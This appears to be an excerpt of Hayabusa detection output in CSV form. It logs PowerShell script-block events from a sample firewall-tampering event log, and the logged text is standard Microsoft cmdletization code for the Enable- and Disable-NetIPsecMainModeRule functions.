$__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MainModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MainModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('MainModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetMainModeRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetMainModeRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetMainModeRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeCryptoSet') -and (@('ByAssociatedNetIPsecMainModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeCryptoSet}, 'MSFT_NetMainModeRuleMMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDi",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:44.864 +00:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"isplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${MainModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MainModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MainModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('MainModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetMainModeRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetMainModeRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetMainModeRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeCryptoSet') -and (@('ByAssociatedNetIPsecMainModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeCryptoSet}, 'MSFT_NetMainModeRuleMMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDi",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:44.864 +00:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"splayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Enable', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Enable-NetIPsecMainModeRule' -Alias '*' function Disable-NetIPsecMainModeRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${MainModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if 